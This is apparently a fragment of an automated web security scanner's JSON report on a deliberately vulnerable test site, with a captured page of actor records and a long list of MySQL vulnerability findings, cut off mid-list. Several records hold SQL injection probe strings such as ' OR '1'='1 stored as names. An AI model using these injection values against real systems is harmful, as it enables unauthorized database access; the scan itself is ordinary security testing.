\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    IDNameSURNAMECREATION DATE
    2 NICK WAHLBERG 2006-02-15 04:34:33
    3 ED CHASE 2006-02-15 04:34:33
    4 JENNIFER DAVIS 2006-02-15 04:34:33
    5 JOHNNY LOLLOBRIGIDA 2006-02-15 04:34:33
    6 BETTE NICHOLSON 2006-02-15 04:34:33
    7 GRACE MOSTEL 2006-02-15 04:34:33
    8 MATTHEW JOHANSSON 2006-02-15 04:34:33
    9 JOE SWANK 2006-02-15 04:34:33
    10 CHRISTIAN GABLE 2006-02-15 04:34:33
    11 ZERO CAGE 2006-02-15 04:34:33
    12 KARL BERRY 2006-02-15 04:34:33
    13 UMA WOOD 2006-02-15 04:34:33
    14 VIVIEN BERGEN 2006-02-15 04:34:33
    15 CUBA OLIVIER 2006-02-15 04:34:33
    16 FRED COSTNER 2012-03-13 12:14:54 22
    17 HELEN VOIGHT 2012-03-13 12:14:54 22
    18 DAN TORN 2012-03-13 12:14:54 22
    19 BOB FAWCETT 2012-03-13 12:14:54 22
    20 LUCILLE TRACY 2012-03-13 12:14:54 22
    21 KIRSTEN PALTROW 2012-03-13 12:14:54 22
    22 ELVIS MARX 2012-03-13 12:14:54 22
    23 SANDRA KILMER 2012-03-13 12:14:54 22
    24 CAMERON STREEP 2012-03-13 12:14:54 22
    25 KEVIN BLOOM 2012-03-13 12:14:54 22
    26 RIP CRAWFORD 2012-03-13 12:14:54 22
    27 JULIA MCQUEEN 2012-03-13 12:14:54 22
    28 WOODY HOFFMAN 2012-03-13 12:14:54 22
    29 ALEC WAYNE 2012-03-13 12:14:54 22
    30 SANDRA PECK 2012-03-13 12:14:54 22
    31 SISSY SOBIESKI 2012-03-13 12:14:54 22
    32 TIM HACKMAN 2012-03-13 12:14:54 22
    33 MILLA PECK 2012-03-13 12:14:54 22
    34 AUDREY OLIVIER 2012-03-13 12:14:54 22
    35 JUDY DEAN 2012-03-13 12:14:54 22
    36 BURT DUKAKIS 2012-03-13 12:14:54 22
    37 VAL BOLGER 2012-03-13 12:14:54 22
    38 TOM MCKELLEN 2012-03-13 12:14:54 22
    39 GOLDIE BRODY 2012-03-13 12:14:54 22
    40 JOHNNY CAGE 2012-03-13 12:14:54 22
    41 JODIE DEGENERES 2012-03-13 12:14:54 22
    42 TOM MIRANDA 2012-03-13 12:14:54 22
    43 KIRK JOVOVICH 2012-03-13 12:14:54 22
    44 NICK STALLONE 2012-03-13 12:14:54 22
    45 REESE KILMER 2012-03-13 12:14:54 22
    46 PARKER GOLDBERG 2012-03-13 12:14:54 22
    47 JULIA BARRYMORE 2012-03-13 12:14:54 22
    48 FRANCES DAY-LEWIS 2012-03-13 12:14:54 22
    49 ANNE CRONYN 2012-03-13 12:14:54 22
    50 NATALIE HOPKINS 2012-03-13 12:14:54 22
    51 GARY PHOENIX 2012-03-13 12:14:54 22
    52 CARMEN HUNT 2012-03-13 12:14:54 22
    53 MENA TEMPLE 2012-03-13 12:14:54 22
    54 PENELOPE PINKETT 2012-03-13 12:14:54 22
    55 FAY KILMER 2012-03-13 12:14:54 22
    56 DAN HARRIS 2012-03-13 12:14:54 22
    57 JUDE CRUISE 2012-03-13 12:14:54 22
    58 CHRISTIAN AKROYD 2012-03-13 12:14:54 22
    59 DUSTIN TAUTOU 2012-03-13 12:14:54 22
    60 HENRY BERRY 2012-03-13 12:14:54 22
    61 CHRISTIAN NEESON 2012-03-13 12:14:54 22
    62 JAYNE NEESON 2012-03-13 12:14:54 22
    63 CAMERON WRAY 2012-03-13 12:14:54 22
    64 RAY JOHANSSON 2012-03-13 12:14:54 22
    65 ANGELA HUDSON 2012-03-13 12:14:54 22
    66 MARY TANDY 2012-03-13 12:14:54 22
    67 JESSICA BAILEY 2012-03-13 12:14:54 22
    68 RIP WINSLET 2012-03-13 12:14:54 22
    69 KENNETH PALTROW 2012-03-13 12:14:54 22
    70 MICHELLE MCCONAUGHEY 2012-03-13 12:14:54 22
    71 ADAM GRANT 2012-03-13 12:14:54 22
    72 SEAN WILLIAMS 2012-03-13 12:14:54 22
    73 GARY PENN 2012-03-13 12:14:54 22
    74 MILLA KEITEL 2012-03-13 12:14:54 22
    75 BURT POSEY 2012-03-13 12:14:54 22
    76 ANGELINA ASTAIRE 2012-03-13 12:14:54 22
    77 CARY MCCONAUGHEY 2012-03-13 12:14:54 22
    78 GROUCHO SINATRA 2012-03-13 12:14:54 22
    79 MAE HOFFMAN 2012-03-13 12:14:54 22
    80 RALPH CRUZ 2012-03-13 12:14:54 22
    81 SCARLETT DAMON 2012-03-13 12:14:54 22
    82 WOODY JOLIE 2012-03-13 12:14:54 22
    83 BEN WILLIS 2012-03-13 12:14:54 22
    84 JAMES PITT 2012-03-13 12:14:54 22
    85 MINNIE ZELLWEGER 2012-03-13 12:14:54 22
    86 GREG CHAPLIN 2012-03-13 12:14:54 22
    87 SPENCER PECK 2012-03-13 12:14:54 22
    88 KENNETH PESCI 2012-03-13 12:14:54 22
    89 CHARLIZE DENCH 2012-03-13 12:14:54 22
    90 SEAN GUINESS 2012-03-13 12:14:54 22
    91 CHRISTOPHER BERRY 2012-03-13 12:14:54 22
    92 KIRSTEN AKROYD 2012-03-13 12:14:54 22
    93 ELLEN PRESLEY 2012-03-13 12:14:54 22
    94 KENNETH TORN 2012-03-13 12:14:54 22
    95 DARYL WAHLBERG 2012-03-13 12:14:54 22
    96 GENE WILLIS 2012-03-13 12:14:54 22
    97 MEG HAWKE 2012-03-13 12:14:54 22
    98 CHRIS BRIDGES 2012-03-13 12:14:54 22
    99 JIM MOSTEL 2012-03-13 12:14:54 22
    100 SPENCER DEPP 2012-03-13 12:14:54 22
    101 SUSAN DAVIS 2012-03-13 12:14:54 22
    102 WALTER TORN 2012-03-13 12:14:54 22
    103 MATTHEW LEIGH 2012-03-13 12:14:54 22
    104 PENELOPE CRONYN 2012-03-13 12:14:54 22
    105 SIDNEY CROWE 2012-03-13 12:14:54 22
    106 GROUCHO DUNST 2012-03-13 12:14:54 22
    107 GINA DEGENERES 2012-03-13 12:14:54 22
    108 WARREN NOLTE 2012-03-13 12:14:54 22
    109 SYLVESTER DERN 2012-03-13 12:14:54 22
    110 SUSAN DAVIS 2012-03-13 12:14:54 22
    111 CAMERON ZELLWEGER 2012-03-13 12:14:54 22
    112 RUSSELL BACALL 2012-03-13 12:14:54 22
    113 MORGAN HOPKINS 2012-03-13 12:14:54 22
    114 MORGAN MCDORMAND 2012-03-13 12:14:54 22
    115 HARRISON BALE 2012-03-13 12:14:54 22
    116 DAN STREEP 2012-03-13 12:14:54 22
    117 RENEE TRACY 2012-03-13 12:14:54 22
    118 CUBA ALLEN 2012-03-13 12:14:54 22
    119 WARREN JACKMAN 2012-03-13 12:14:54 22
    120 PENELOPE MONROE 2012-03-13 12:14:54 22
    121 LIZA BERGMAN 2012-03-13 12:14:54 22
    122 SALMA NOLTE 2012-03-13 12:14:54 22
    123 JULIANNE DENCH 2012-03-13 12:14:54 22
    124 SCARLETT BENING 2012-03-13 12:14:54 22
    125 ALBERT NOLTE 2012-03-13 12:14:54 22
    126 FRANCES TOMEI 2012-03-13 12:14:54 22
    127 KEVIN GARLAND 2012-03-13 12:14:54 22
    128 CATE MCQUEEN 2012-03-13 12:14:54 22
    129 DARYL CRAWFORD 2012-03-13 12:14:54 22
    130 GRETA KEITEL 2012-03-13 12:14:54 22
    131 JANE JACKMAN 2012-03-13 12:14:54 22
    132 ADAM HOPPER 2012-03-13 12:14:54 22
    133 RICHARD PENN 2012-03-13 12:14:54 22
    134 GENE HOPKINS 2012-03-13 12:14:54 22
    135 RITA REYNOLDS 2012-03-13 12:14:54 22
    136 ED MANSFIELD 2012-03-13 12:14:54 22
    137 MORGAN WILLIAMS 2012-03-13 12:14:54 22
    138 LUCILLE DEE 2012-03-13 12:14:54 22
    139 EWAN GOODING 2012-03-13 12:14:54 22
    140 WHOOPI HURT 2012-03-13 12:14:54 22
    141 CATE HARRIS 2012-03-13 12:14:54 22
    142 JADA RYDER 2012-03-13 12:14:54 22
    143 RIVER DEAN 2012-03-13 12:14:54 22
    144 ANGELA WITHERSPOON 2012-03-13 12:14:54 22
    145 KIM ALLEN 2012-03-13 12:14:54 22
    146 ALBERT JOHANSSON 2012-03-13 12:14:54 22
    147 FAY WINSLET 2012-03-13 12:14:54 22
    148 EMILY DEE 2012-03-13 12:14:54 22
    149 RUSSELL TEMPLE 2012-03-13 12:14:54 22
    150 JAYNE NOLTE 2012-03-13 12:14:54 22
    151 GEOFFREY HESTON 2012-03-13 12:14:54 22
    152 BEN HARRIS 2012-03-13 12:14:54 22
    153 MINNIE KILMER 2012-03-13 12:14:54 22
    154 MERYL GIBSON 2012-03-13 12:14:54 22
    155 IAN TANDY 2012-03-13 12:14:54 22
    156 FAY WOOD 2012-03-13 12:14:54 22
    157 GRETA MALDEN 2012-03-13 12:14:54 22
    158 VIVIEN BASINGER 2012-03-13 12:14:54 22
    159 LAURA BRODY 2012-03-13 12:14:54 22
    160 CHRIS DEPP 2012-03-13 12:14:54 22
    161 HARVEY HOPE 2012-03-13 12:14:54 22
    162 OPRAH KILMER 2012-03-13 12:14:54 22
    163 CHRISTOPHER WEST 2012-03-13 12:14:54 22
    164 HUMPHREY WILLIS 2012-03-13 12:14:54 22
    165 AL GARLAND 2012-03-13 12:14:54 22
    166 NICK DEGENERES 2012-03-13 12:14:54 22
    167 LAURENCE BULLOCK 2012-03-13 12:14:54 22
    168 WILL WILSON 2012-03-13 12:14:54 22
    169 KENNETH HOFFMAN 2012-03-13 12:14:54 22
    170 MENA HOPPER 2012-03-13 12:14:54 22
    171 OLYMPIA PFEIFFER 2012-03-13 12:14:54 22
    172 GROUCHO WILLIAMS 2012-03-13 12:14:54 22
    173 ALAN DREYFUSS 2012-03-13 12:14:54 22
    174 MICHAEL BENING 2012-03-13 12:14:54 22
    175 WILLIAM HACKMAN 2012-03-13 12:14:54 22
    176 JON CHASE 2012-03-13 12:14:54 22
    177 GENE MCKELLEN 2012-03-13 12:14:54 22
    178 LISA MONROE 2012-03-13 12:14:54 22
    179 ED GUINESS 2012-03-13 12:14:54 22
    180 JEFF SILVERSTONE 2012-03-13 12:14:54 22
    181 MATTHEW CARREY 2012-03-13 12:14:54 22
    182 DEBBIE AKROYD 2012-03-13 12:14:54 22
    183 RUSSELL CLOSE 2012-03-13 12:14:54 22
    184 HUMPHREY GARLAND 2012-03-13 12:14:54 22
    185 MICHAEL BOLGER 2012-03-13 12:14:54 22
    186 JULIA ZELLWEGER 2012-03-13 12:14:54 22
    187 RENEE BALL 2012-03-13 12:14:54 22
    188 ROCK DUKAKIS 2012-03-13 12:14:54 22
    189 CUBA BIRCH 2012-03-13 12:14:54 22
    190 AUDREY BAILEY 2012-03-13 12:14:54 22
    191 GREGORY GOODING 2012-03-13 12:14:54 22
    192 JOHN SUVARI 2012-03-13 12:14:54 22
    193 BURT TEMPLE 2012-03-13 12:14:54 22
    194 MERYL ALLEN 2012-03-13 12:14:54 22
    195 JAYNE SILVERSTONE 2012-03-13 12:14:54 22
    196 BELA WALKEN 2012-03-13 12:14:54 22
    197 REESE WEST 2012-03-13 12:14:54 22
    198 MARY KEITEL 2012-03-13 12:14:54 22
    199 JULIA FAWCETT 2012-03-13 12:14:54 22
    200 THORA TEMPLE 2012-03-13 12:14:54 22
    412 -1 OR 1=1 test 2012-03-13 12:14:54 22
    413 -1 OR 1=1 test 2012-03-13 12:14:54 22
    414 NS1NO test 2012-03-13 12:14:54 22
    415 1 AND 'NS='ss test 2012-03-13 12:14:54 22
    416 ' OR 'ns'='ns test 2012-03-13 12:14:54 22
    417 -1 OR 17-7=10 test 2012-03-13 12:14:54 22
    418 1 OR X='ss test 2012-03-13 12:14:54 22
    419 ' OR '1'='1 test 2012-03-13 12:14:54 22
    420 ' OR '1'='1 test 2012-03-13 12:14:54 22

    \n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      Acunetix xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \n\n
    \n\tThis website is automatically reset at every midnight (00:00 - UTC).\n
    \n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 180.5509, + "StatusCode": 200 + }, + "LookupId": "b89d9038-b732-471a-657c-ad49020ee0ad", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Use of a Broken or Risky Cryptographic Algorithm Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Access Control Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, 